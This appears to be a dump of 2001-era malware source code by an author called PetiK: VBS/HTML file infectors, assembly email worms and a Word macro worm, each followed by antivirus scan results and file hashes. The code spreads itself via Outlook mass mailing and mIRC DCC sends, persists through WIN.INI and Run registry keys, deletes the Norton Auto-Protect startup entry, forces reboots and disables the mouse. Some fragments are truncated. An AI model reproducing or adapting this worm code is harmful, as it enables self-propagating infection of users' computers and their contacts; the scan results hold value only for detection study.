ExtName = lcase(FSO.GetExtensionName(cible.Name))
if ExtName = "htm" or ExtName = "html" Then
if vrai.readline <> "<bother>" Then
vrai.close()
vrai.close()
vrai.WriteLine "<bother>"
vrai.Write(htmorg)
vrai.WriteLine "<bother par PetiK May 9th 2001>"
vrai.Close()
else
Real.close()
end if
end if
next
</SCRIPT>
</body>
</html>
File Bother.htm received on 05.16.2009 11:20:32 (CET)
a-squared 4.0.0.101 2009.05.16 Virus.VBS.Both!IK
AhnLab-V3 5.0.0.2 2009.05.15 HTML/Bother
AntiVir 7.9.0.168 2009.05.15 VBS/Both
Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS
Authentium 5.1.2.4 2009.05.15 VBS/Both.A
AVG 8.5.0.336 2009.05.15 VBS/Bother.A
BitDefender 7.2 2009.05.16 VBS.Both.A
CAT-QuickHeal 10.00 2009.05.15 VBS/Both.A
ClamAV 0.94.1 2009.05.15 VBS.Startpage-1
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Bother
eSafe 7.0.17.0 2009.05.14 Virus.VBS.Both
eTrust-Vet 31.6.6508 2009.05.16 VBS/Both
F-Prot 4.4.4.56 2009.05.15 VBS/Both.A
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Both
Fortinet 3.117.0.0 2009.05.16 VBS/Both.A
GData 19 2009.05.16 VBS.Both.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Both
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Both
McAfee 5616 2009.05.15 VBS/Bother
McAfee+Artemis 5616 2009.05.15 VBS/Bother
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Both
Microsoft 1.4602 2009.05.16 Virus:VBS/SYSID
NOD32 4080 2009.05.15 VBS/Bother
Norman 6.01.05 2009.05.16 VBS/Both.K
nProtect 2009.1.8.0 2009.05.16 VBS.Both.A
Panda 10.0.0.14 2009.05.15 Univ.A
PCTools 4.4.2.0 2009.05.15 VBS.Bother.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Script.HTML.Both
Sophos 4.41.0 2009.05.16 VBS/Bother
Sunbelt 3.2.1858.2 2009.05.16 Virus.VBS.Both (v)
Symantec 1.4.4.12 2009.05.16 VBS.Bother.3180
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 HTML_BOTHER.A
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Both
ViRobot 2009.5.15.1737 2009.05.15 VBS.Both
VirusBuster 4.6.5.0 2009.05.15 VBS.Bother.A
MD5...: 915aaf9b61f0d62c1fc2082198b324be
SHA1..: e2bf913ffca85e796ecef0564a896625dc748332
comment #
Name : I-Worm.Friends
Author : PetiK
Date : May 13th - May 15th 2001
Action : This worm use a VBS script and Micosoft Outlook to spread. It copies itself to
\%SYSTEM%\Iesetup.exe. WIN.INI is modified with run=\%SYSTEM%\Iesetup.exe.
It creates a script file for mIRC in C:\mirc ans C:\mirc32.
It shows the first time a fake Winzip message box.
The worm creates C:\Friends and creates the file maya.vbs to spread.
It changes the values : HKLM\Software\Microsoft\Windows\CurrentVersion
RegisteredOwner : Maya, Laurent, Etienne
RegisteredOrganization : PetiK Corporation
On 5th of every month, it shows a message box.
.386
jumps
locals
.model flat,stdcall
;KERNEL32.dll
extrn lstrcat:PROC
extrn WinExec:PROC
;USER32.dll
;ADVAPI32.dll
.data
szPTK db 50 dup (0)
szWin db 50 dup (0)
FileHandle dd ?
RegHandle dd ?
octets dd ?
winini db "\\WIN.INI",00h
run db "run",00h
Copie db "\Iesetup.exe",00h
inifile db "\petik",00h
VBS db "C:\Friends\maya.vbs",00h
DIR db "C:\Friends",00h
OWN_D db "RegisteredOwner",00h
OWN_S db "Maya, Laurent, Etienne",00h
ORG_D db "RegisteredOrganization",00h
ORG_S db "PetiK Corporation",00h
SOUS_CLE db "Software\Microsoft\Windows\CurrentVersion",00h
TITRE db "WinZip Self-Extractor",00h
TEXTE db "WinZip Self-Extractor header corrupt. Possible cause: bad disk or file
transfer error",00h
TITRE2 db "I-Worm.Friends",00h
TEXTE2 db "Coded by PetiK (c)2001",0dh,0ah
db "",0dh,0ah
db "To my friends Maya and Laurent",00h
email db "wscript C:\Friends\maya.vbs",00h
CREATE_NEW equ 00000001h
HKEY_LOCAL_MACHINE equ 80000002h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wsecond WORD ?
SYSTIME ends
petikd: db "[script]",0dh,0ah
db "",0dh,0ah
db "n3=}",00h
PETIKTAILLE equ $-petikd
mayad:
db 'fso.Copyfile fso.GetSpecialFolder(1)&"\Iesetup.exe",
fso.GetSpecialFolder(1)&"\NetFriends.exe"',0dh,0ah
db 'Next',0dh,0ah
db 'N.Subject = "Would you like a Net Friend ?"',0dh,0ah
db 'N.Body = "Look at this zip file to find a Net Friend"',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(1),"NetFriends.exe")',0dh,0ah
db 'If N.To <> "" Then',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
MAYATAILLE equ $-mayad
.code
DEBUT:
PREPAR: push 50
push offset szCopie
push offset Copie
push offset szCopie
call lstrcat
FILE: push 50 ; Create PetiK in \%WINDIR%, a mIRC script
push offset szPTK
push offset inifile
push offset szPTK
call lstrcat
push 00h
push FILE_ATTRIBUTE_READONLY
push CREATE_NEW
push 00h
push FILE_SHARE_READ
push GENERIC_WRITE
push offset szPTK ; success ? continue
call CreateFileA
cmp eax,-1
je BDR ; or else, jump to label BDR
mov [FileHandle],eax
push 00h
push offset octets
push PETIKTAILLE
push offset petikd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle ; the file is create
MIRC: push 00h

push offset script1
push offset szPTK
call CopyFileA ; copy the file to C:\mirc
push 00h
push offset script2
push offset szPTK
call CopyFileA ; and C:\mirc32
EMAIL: push 00h

push offset DIR
call CreateDirectoryA ; Create the directory C:\Friends
push 00h
push CREATE_ALWAYS
push 00h
push GENERIC_WRITE
push offset VBS
call CreateFileA ; and put the VBS file maya.vbs
push 00h
push offset octets
push MAYATAILLE
push offset mayad
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle
ENVOIE: push 01h

push offset email
call WinExec ; run this file
COPIE: push 00h

push 50
push offset szOrig
push eax
push 00h
push offset szCopie
push offset szOrig
call CopyFileA ; Copy our file ti \%SYSTEM%\Iesetup.exe
WIN_INI:push 50h
push offset szWin
push offset winini
push offset szWin
call lstrcat
push offset szWin ; Write to WIN.INI file in run section
push offset szCopie ; [windows]
push offset run ; run=\%SYSTEM%\Iesetup.exe
push offset windows
call WritePrivateProfileStringA
MESS: push 10h ; Show the fake error message
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA
BDR: push offset RegHandle
push KEY_SET_VALUE
push 00h
push offset SOUS_CLE
push HKEY_LOCAL_MACHINE
call RegOpenKeyExA
push 02h
push offset OWN_D
push offset REG_SZ
push 00h
push offset OWN_S
push [RegHandle]
call RegSetValueExA ; Change the name of Registered Owner
push 02h
push offset ORG_D
push offset REG_SZ
push 00h
push offset ORG_S
push [RegHandle]
call RegSetValueExA ; Change the name of Registered Organization
push [RegHandle]
call RegCloseKey
DATE: push offset SystemTime

call GetSystemTime
cmp [SystemTime.wDay],05h ; 5th of the month ?
jne FIN
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
call MessageBoxA ; Show a messagebox
FIN: push 00h

call ExitProcess
end DEBUT
File Friends.exe received on 05.16.2009 11:58:15 (CET)
AhnLab-V3 5.0.0.2 2009.05.15 Win32/PetTick.6656
Authentium 5.1.2.4 2009.05.15 W32/Malware!543d
Avast 4.8.1335.0 2009.05.15 Win32:PetiK-Friends
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.B
BitDefender 7.2 2009.05.16 Generic.Malware.IM.34A9CFBA
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.B
ClamAV 0.94.1 2009.05.15 W32.PetTick
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.6656
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.6656.A
F-Prot 4.4.4.56 2009.05.15 W32/Malware!543d
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.B@mm
GData 19 2009.05.16 Generic.Malware.IM.34A9CFBA
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.B
NOD32 4080 2009.05.15 Win32/Petik.B
nProtect 2009.1.8.0 2009.05.16 Worm/W32.Petik.6656.C
Panda 10.0.0.14 2009.05.16 W32/Petik.B
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.v
Sophos 4.41.0 2009.05.16 W32/Petik-B
Sunbelt 3.2.1858.2 2009.05.16 Friends worm
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.B
ViRobot 2009.5.15.1737 2009.05.15 I-Worm.Win32.PetTick.6656.A
MD5...: 18651c3df28058b96d1297d1568d4fd8
SHA1..: b6689d3f64f47909b219b4a17fcae7c3f6567fd8
comment #
Name : I-Worm.Mustard
Author : PetiK
Date : May 10th - 27th
Size : 7168 bytes
Action : When the worm is first executed, it will create the key HKCU\Software\[PetiK].
After, it will copy itself as Windows\AVUpdate.exe. It alters the run= in the Win.ini
file to :
run=Windows\AVUpdate.exe. It will try to delete the value "Norton Auto-Protect" in the
Run key of registry. If it succeed, he alter "Exclude.dat" so that the VBS file don't
analyze by Norton Antivirus. It shows a message box and reboot the computer. Next start,
it will creates a VBS worm with the attributes "readonly" and "hidden".
On June 17th, it shows a message box.
.386
jumps
locals
.model flat,stdcall
extrn ExitWindowsEx:PROC
extrn GetFileAttributesA:PROC
extrn lstrcat:PROC
extrn RegDeleteValueA:PROC
extrn RegQueryValueExA:PROC
extrn SetFileAttributesA:PROC
extrn SetFilePointer:PROC
extrn Sleep:PROC
extrn WinExec:PROC
.data
FileHandle dd ?
RegHandle dd ?
octets dd ?
regDisp dd 0
regResu dd 0
Dist dd 0
szNOR db 50 dup (0)
szWin db 50 dup (0)
Buffer db 7Fh dup (0)
BufferSize dd 7Fh
run db "run",00h
Copie db "\AVUpdate.exe",00h
filedat db "\Exclude.dat",00h
email db "wscript C:\send.vbs",00h
VBS db "C:\send.vbs",00h
mirc db "C:\Win.sys",00h
script3 db "C:\Program Files\mirc\script.ini",00h
script4 db "C:\Program Files\mirc32\script.ini",00h
CLE db "Software\[PetiK]",00h
TITRE db "Install Information",00h
TEXTE db "Please reboot your computer to finish the installation",00h
CLE_RUN db "Software\Microsoft\Windows\CurrentVersion\Run",00h
NAV db "Norton Auto-Protect",00h
CLE_NOR db "\Software\Symantec\InstalledApps",00h
ValueType dd 00h
Value db "NAV",00h
CREE db "I-Worm.Mustard par PetiK (c)2001",00h
TITRE2 db "I-Worm.Mustard",00h
TEXTE2 db " Coded By PetiK (c)2001 ",0dh,0ah
db "",0dh,0ah
db "Small but Pretty",0dh,0ah
db "I Love You",0dh,0ah
db "Since January",0dh,0ah
db "I Think Of You",00h

HKEY_CURRNET_USER equ 80000001h
KEY_ALL_ACCESS equ 0000003Fh
FILE_ATTRIBUTE_HIDDEN equ 00000002h
OPEN_EXISTING equ 00000003h
FILE_END equ 00000002h
EWX_REBOOT equ 00000002h
EWX_FORCE equ 00000004h
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
mircd:
db "[script]",0dh,0ah
db "n2= ./dcc send $nick "
db "",0dh,0ah
db "n3=}",00h
MIRCTAILLE equ $-mircd
sendd:
db 'ENTREE()',0dh,0ah
db 'Sub ENTREE',0dh,0ah
db 'N.To = P.Address',0dh,0ah
db 'N.Subject = "AntiVirus Update"',0dh,0ah
db 'N.Body = "The last version of your AV"',0dh,0ah
db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"AVUpdate.exe")',0dh,0ah
db 'N.DeleteAfterSubmit = True',0dh,0ah
db 'N.Send',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
SENDTAILLE equ $-sendd
datd:
db
02Ah,02Eh,076h,062h,073h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
,000h
db
,000h
db
,000h
db
,000h
db
,000h
db
,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,001h,0E6h,003h
DATTAILLE equ $-datd
.code
DEBUT:
VERIF: push offset regDisp
push offset regResu
push 00h
push 0F003Fh
push 00h
push 00h ; HKCU\Software\[PetiK] exist ?
push 00h
push offset CLE
push HKEY_CURRNET_USER
push [regResu]
call RegCloseKey
cmp [regDisp],1
jne EMAIL ; YES => EMAIL
COPIE: push 00h

push 50
push offset szOrig
push eax
push 50
push offset szCopie
push offset Copie
push offset szCopie
call lstrcat
push offset szCopie
push offset szOrig
call CopyFileA ; Copy itself to \WINDIR\AVUpdate.exe
WIN_INI:push 50
push offset szWin
push offset Winini
push offset szWin
call lstrcat
push offset szWin ; Alters the run= line in the WIN.INI
push offset szCopie
push offset run
push offset windows ; run=\WINDIR\AVUpdate.exe
MIRC1: push 00h
push CREATE_ALWAYS
push 00h
push GENERIC_WRITE
push offset mirc
call CreateFileA
push 00h
push offset octets
push MIRCTAILLE
push offset mircd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle ; Create a ini script for mIRC
MIRC2: push 00h
push offset script1
push offset mirc
call CopyFileA ; Copy to \mirc
push 00h
push offset script2
push offset mirc
call CopyFileA ; \mirc32
push 00h
push offset script3
push offset mirc
call CopyFileA ; \Program Files\mirc
push 00h
push offset script4
push offset mirc
call CopyFileA ; \Program Files\mirc32
push offset mirc
call DeleteFileA ; and delete the first file
DEL_REG:push offset RegHandle

push KEY_ALL_ACCESS
push 00h
push offset CLE_RUN
call RegOpenKeyExA
VAL1: push offset NAV ; Try to delete "Norton Auto-Protect"

value
push [RegHandle]
call RegDeleteValueA
test eax,eax
jnz EMAIL ; NO => jmp EMAIL
push [RegHandle]
call RegCloseKey
NORTON: push offset RegHandle
push 001F0000h
push 00h
push offset CLE_NOR
call RegOpenKeyExA
test eax,eax
jnz FIN
push offset BufferSize
push offset Buffer
push offset ValueType
push 00h ; Search the "InstallDir" of Norton
push offset Value
push RegHandle
call RegQueryValueExA
push [RegHandle]
call RegCloseKey
TRAFIC: push offset filedat

push offset Buffer
call lstrcat
push offset Buffer
call GetFileAttributesA
cmp eax,FILE_ATTRIBUTE_READONLY ; Attribute read only for the file ?
je FIN ; YES => FIN
push 00h
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 00h
push GENERIC_WRITE
push offset Buffer
call CreateFileA
cmp eax,-1
je REBOOT ; File exist ? NO => jmp REBOOT
push FILE_END
push 00h
push [Dist]
push [FileHandle]
call SetFilePointer ; End of the file
push 00h
push offset octets
push DATTAILLE
push offset datd
push [FileHandle]
call WriteFile ; Write datas
push [FileHandle]
call CloseHandle
push 5000
call Sleep ; Wait 5 seconds
push offset Buffer
call SetFileAttributesA ; Attribute read only for the file
MESSAGE:push 40h
push offset TITRE
push offset TEXTE
push 00h
call MessageBoxA
REBOOT: push EWX_REBOOT or EWX_FORCE

call ExitWindowsEx
EMAIL: push 00h

push FILE_ATTRIBUTE_READONLY or FILE_ATTRIBUTE_HIDDEN
push CREATE_NEW
push 00h
push GENERIC_WRITE
push offset VBS ; success ? continue
call CreateFileA
cmp eax,-1
je DATE ; else, jump to label BDR
push 00h
push offset octets
push SENDTAILLE
push offset sendd
push [FileHandle]
call WriteFile
push [FileHandle]
call CloseHandle
ENVOIE: push 01h
push offset email
call WinExec
ATTEND: push 10000

call Sleep
EFFACE: push offset VBS

call DeleteFileA

call GetSystemTime
jne FIN
jne FIN
push 40h
push offset TITRE2
push offset TEXTE2
push 00h
call MessageBoxA
FIN: push 00h

call ExitProcess
end DEBUT
File Mustard.exe received on 05.16.2009 17:59:52 (CET)

AhnLab-V3 5.0.0.2 2009.05.16 -
Authentium 5.1.2.4 2009.05.16 W32/Malware!989a
Avast 4.8.1335.0 2009.05.15 Win32:Petik-Mustard
AVG 8.5.0.336 2009.05.15 I-Worm/Petik.U
BitDefender 7.2 2009.05.16 Win32.Mustar.A@mm
CAT-QuickHeal 10.00 2009.05.15 W32.Petik.D
ClamAV 0.94.1 2009.05.16 Worm.Petik.d
Comodo 1157 2009.05.08 Worm.Win32.Petik.D
DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.7168
eSafe 7.0.17.0 2009.05.14 -
F-Prot 4.4.4.56 2009.05.16 W32/Malware!989a
Fortinet 3.117.0.0 2009.05.16 W32/PetTick.U@mm
GData 19 2009.05.16 Win32.Mustar.A@mm
Microsoft 1.4602 2009.05.16 Worm:Win32/Petik.D@mm
NOD32 4080 2009.05.15 Win32/Petik.D
Norman 6.01.05 2009.05.16 W32/Pet_Tick.7168
nProtect 2009.1.8.0 2009.05.16 -
Panda 10.0.0.14 2009.05.16 W32/Petik.D
PCTools 4.4.2.0 2009.05.16 Worm.Petik
Prevx 3.0 2009.05.16 Medium Risk Malware
Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.y
Sophos 4.41.0 2009.05.16 W32/Petik-D
Sunbelt 3.2.1858.2 2009.05.16 Worm.Petik
TrendMicro 8.950.0.1092 2009.05.15 WORM_PET.TICK.U
ViRobot 2009.5.15.1737 2009.05.15 -
MD5...: 2aae09e21d35fd56f7aa0f603dcb6151
SHA1..: 4fbe3b2758bdb50ea45bb4593f074239c30bdd5d
<--
Name : HTML.Embargo
Author : PetiK
Language : HTML/VBS
' Copy it self into %WINDIR%\WinHelp.htm

' Modify AUTOEXEC.BAT to display a message
' Modify Start Page of Internet Explorer with the WinHelp.htm file
' Forces FullScreen to Internet Explorer
' Spread with MIRC
' Infects all HTM and HTML file into %WINDIR%\Web\Wallpaper
' If day is 5th or 17th it runs "cdplayer.exe", "notepad.exe", etc...
-->
<embargo>
<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>
<BODY bgColor=#ffffff>
Set original=document.body.createTextRange
Set copie=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\WinHelp.htm")
copie.WriteLine "<embargo>"
copie.WriteLine "<HTML><HEAD><TITLE>WinHelp</TITLE></HEAD>"
copie.WriteLine "<BODY bgColor=#ffffff>"
copie.WriteLine original.htmltext
copie.WriteLine "</BODY></HTML>"
copie.Close()
reg=ws.RegRead("HKLM\Software\HTML.Embargo\")
If reg <> "c parti" Then
Set auto=fso.OpenTextFile("C:\autoexec.bat", 1, False, False)
tout=auto.ReadAll
Set nouveau= fso.CreateTextFile("C:\autoexec.bat", True, False)
nouveau.Write(tout)
nouveau.WriteLine ""
nouveau.WriteLine "@echo off"
nouveau.WriteLine ":embargo"
nouveau.WriteLine "cls"
nouveau.WriteLine "echo This is the signature of my new virus"
nouveau.WriteLine "echo."
nouveau.WriteLine "echo HTML.Embargo by PetiK"
nouveau.WriteLine "echo Made In France (c)2001"
nouveau.WriteLine "pause"
nouveau.WriteLine "goto embargo"
nouveau.Close()
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page",fso.GetSpecialFolder(0)&"\WinHelp.htm"
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\FullScreen","yes"
ws.RegWrite "HKLM\Software\HTML.Embargo\","c parti"
End If
reg=ws.RegRead("HKLM\Software\HTML.Embargo\mirc")
If reg <> "c parti" Then
PFD=ws.RegRead("HKLM\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
If dossier = "" Then
If fso.FileExists("c:\mirc\mirc.ini") Then dossier = "c:\mirc"
If fso.FileExists("c:\mirc32\mirc.ini") Then dossier = "c:\mirc32"
If fso.FileExists(PFD & "\mirc\mirc.ini") Then dossier = PFD & "\mirc"
If fso.FileExists(PFD & "\mirc32\mirc.ini") Then dossier = PFD & "\mirc32"
End If
If dossier <> "" Then
Set script = fso.CreateTextFile(dossier & "\script.ini", True)
script.WriteLine "[script]"
script.WriteLine "n0=on 1:JOIN:#:{"
script.WriteLine "n1= /if ( $nick == &me ) (halt)"
script.WriteLine "n2= ./dcc send $nick " & fso.GetSpecialFolder(0)&"\WinHelp.htm"
script.WriteLine "n3=}"
ws.RegWrite "HKLM\Software\HTML.Embargo\mirc","c parti"
End If
Set FolderObj = fso.GetFolder(fso.GetSpecialFolder(0)&"\WEB\WallPaper")

For Each cible in FO
ext = lcase(fso.GetExtensionName(cible.Name))
If ext = "htm" or ext = "html" Then
Set vrai = fso.OpenTextFile(cible.path, 1, false)
If vrai.readline <> "<embargo>" Then
vrai.Close()
Set vrai = fso.OpenTextFile(cible.path, 1, false)
vrai.Close()
vrai.WriteLine(htmorg)
vrai.WriteLine ""
vrai.Close()
Else
vrai.Close()
End If
End If
Next
End If
If Day(Now()) = 5 or Day(Now)) = 17 Then

ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\CDPlayer",fso.GetSpecialFolder(0)&"\C
dplayer.exe"
ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NotePad",fso.GetSpecialFolder(0)&"\No
tepad.exe"
ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\PaintBrush",fso.GetSpecialFolder(0)&"
\Pbrush.exe"
ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer",fso.GetSpecialFolder(0)&"\E
xplorer.exe"
ws.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\RegEdit",fso.GetSpecialFolder(0)&"\Re
gedit.exe"
ws.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut","60"
ws.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveUsePassword", 01, "REG_DWORD"
document.Write "<font face='verdana' color=blue size='2'>Microsoft Internet

Explorer<br>Please enabled ActiveX to see this page<br></font>"
</SCRIPT>
</BODY></HTML>
File Embargo.htm received on 05.16.2009 11:30:48 (CET)

a-squared 4.0.0.101 2009.05.16 VBS.Embargo!IK
AhnLab-V3 5.0.0.2 2009.05.15 HTML/Petik
AntiVir 7.9.0.168 2009.05.15 Worm/Petik.J
Authentium 5.1.2.4 2009.05.15 VBS/Embargo.A
Avast 4.8.1335.0 2009.05.15 BV:KillAll
AVG 8.5.0.336 2009.05.15 VBS/Bother
BitDefender 7.2 2009.05.16 VBS.Embargo.A
CAT-QuickHeal 10.00 2009.05.15 VBS.Petik.J
ClamAV 0.94.1 2009.05.15 -
Comodo 1157 2009.05.08 Unclassified Malware
DrWeb 5.0.0.12182 2009.05.16 VBS.Generic.262
eSafe 7.0.17.0 2009.05.14 Email-Win32.Petik.j
eTrust-Vet 31.6.6508 2009.05.16 VBS/Both
F-Prot 4.4.4.56 2009.05.15 VBS/Embargo.A
F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik.j
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.J!worm
GData 19 2009.05.16 VBS.Embargo.A
Ikarus T3.1.1.49.0 2009.05.16 VBS.Embargo
K7AntiVirus 7.10.735 2009.05.14 -
Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik.j
McAfee 5616 2009.05.15 VBS/Ergo.intd
McAfee+Artemis 5616 2009.05.15 VBS/Ergo.intd
McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.J
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.J
NOD32 4080 2009.05.15 VBS/Petik.J
Norman 6.01.05 2009.05.16 mIRC/Gen_HTM
nProtect 2009.1.8.0 2009.05.16 VBS.Embargo.A
Panda 10.0.0.14 2009.05.15 HTML/Embargo
PCTools 4.4.2.0 2009.05.15 VBS.Embargo.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Petik.j
Sophos 4.41.0 2009.05.16 VBS/Ergo-A
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Embaro.A.Intd
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 -
VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik.j
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 VBS.Embargo.A
MD5...: 4ec0004fb7f700df736ae4d3c2c22919
SHA1..: 464dec7db3865638af142f5e8929fcd49e5af667
' Worm Name : W97M.Maya.A
' Author : PetiK
' Language : VBA Word
' Date : May 29th – June 1st 2001
' Size : 33792 – 33280 (with change) bytes
'
'
'
' Change the properties of the documents. If not exist the Value “W97M.Maya” in
' the key HKLM\Software\, the worm copy itself to C:\Windows\Maya.doc. It creates
' the “C:\Maya” directory with a TXT file and a acript file to infect mIRC
' channel. After, it spreads with Microsoft Outlook.
' Subject : “Hi man, it’s ” + user name
' Body : “This is the new net Story”
' “It ‘s great”
' Attachment : Maya.doc
' On 5th of the month, when the document is close, a message box appears.
' When Visual Basic is active, an other message box appears and the worm
' add a value in the “RunKey” of regedit to disabled the mouse.
Sub AutoOpen()
With Dialogs(wdDialogFileSummaryInfo)
.Author = "PetiK"
.Title = "W97M.Maya"
.Comments = "To my best GirlFriend"
.Keywords = "Maya, Bzzbzz, to grow"
.Execute
End With
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") <> "Par

PetiK" Then
ActiveDocument.SaveAs FileName:="C:\Windows\Maya.doc"
ActiveDocument.Saved = True
FileSystem.MkDir "C:\Maya"
Open "C:\Maya\hello.txt" For Output As #1
Print #1, "Le 29 mai 2001 à Munster"
Print #1, "This is my first W97M.Outlook.Worm"
Print #1, "Its name is W97M.Maya"
Close #1
Open "C:\Maya\script.ini" For Output As #1
Print #1, "n0=on 1:JOIN:#:{"
Print #1, "n1= /if ( $nick == $me ) { halt }"
Print #1, "n2= /.dcc send $nick C:\Windows\Maya.doc"
Print #1, "n3=}"
Close #1
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\mirc32\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc\script.ini"
FileSystem.FileCopy "C:\Maya\script.ini", "C:\progra~1\mirc32\script.ini"
FileSystem.Kill "C:\Maya\script.ini"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\", "W97M.Maya") = "Par

PetiK"
End If
Dim maya, bzzbzz, petik

Set maya = CreateObject("Outlook.Application")
Set bzzbzz = maya.GetNameSpace("MAPI")
If maya = "Outlook" Then
bzzbzz.Logon "profile", "password"
For mayacompte = 1 To bzzbzz.AddressLists.Count
Set AB = bzzbzz.AddressLists(mayacompte)
x = 1
Set petik = maya.CreateItem(0)
For compte = 1 To AB.AddressEntries.Count
verif = AB.AddressEntries(x)
petik.Recipients.Add verif
x = x + 1
If x > 500 Then compte = AB.AddressEntries.Count
Next compte
petik.Subject = "Hi man, it's " & Application.UserName
petik.Body = "This is the new net Story" + vbCrLf + "It's great"
petik.Attachments.Add ActiveDocument.FullName
petik.DeleteAfterSubmit = True
petik.Send
verif = ""
Next mayacompte
bzzbzz.Logoff
End If
End Sub
Sub AutoClose()
MsgBox "Coded by PetiK (c)2001", vbInformation, "W97M.Maya"
End If
End Sub
Sub ViewVBCode()
System.PrivateProfileString("",
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "MayAttack") =
"rundll32 mouse,disable"
MsgBox "Curiosity is bad" + vbCr + vbCr + "With her small size" + vbCr + "Maya is alwayas
there", vbCritical, "W97M.Maya"
ShowVisualBasicEditor = True
End Sub
File Maya.doc received on 05.16.2009 17:59:46 (CET)
a-squared 4.0.0.101 2009.05.16 Virus.MSWord.Melissa-based!IK
AhnLab-V3 5.0.0.2 2009.05.16 W97M/Unnamed
AntiVir 7.9.0.168 2009.05.15 W2000M/Ayam.A@mm
Antiy-AVL 2.0.3.1 2009.05.15 Virus/MSWord.MSWord
Authentium 5.1.2.4 2009.05.16 W97M/Ayam.A@mm
Avast 4.8.1335.0 2009.05.15 MW97:Ayam family
AVG 8.5.0.336 2009.05.15 BAT/Generic
BitDefender 7.2 2009.05.16 W97M.Ayam.A@mm
CAT-QuickHeal 10.00 2009.05.15 W97M.Prilissa
ClamAV 0.94.1 2009.05.16 W97M.Ayam.A
Comodo 1157 2009.05.08 Virus.MSWord.Melissabased
DrWeb 5.0.0.12182 2009.05.16 X97M.Papa
eSafe 7.0.17.0 2009.05.14 O97M.GNsm
eTrust-Vet 31.6.6508 2009.05.16 W97M/Ayam.A:mm
F-Prot 4.4.4.56 2009.05.16 W97M/Ayam.A@mm
F-Secure 8.0.14470.0 2009.05.15 Virus.MSWord.Melissa-based
Fortinet 3.117.0.0 2009.05.16 W97M/Ayam.A@MM
GData 19 2009.05.16 W97M.Ayam.A@mm
Ikarus T3.1.1.49.0 2009.05.16 Virus.MSWord.Melissa-based
K7AntiVirus 7.10.737 2009.05.16 Macro.Melissa-based
Kaspersky 7.0.0.125 2009.05.16 Virus.MSWord.Melissa-based
McAfee 5616 2009.05.15 W97M/Generic@MM
McAfee+Artemis 5616 2009.05.15 W97M/Generic@MM
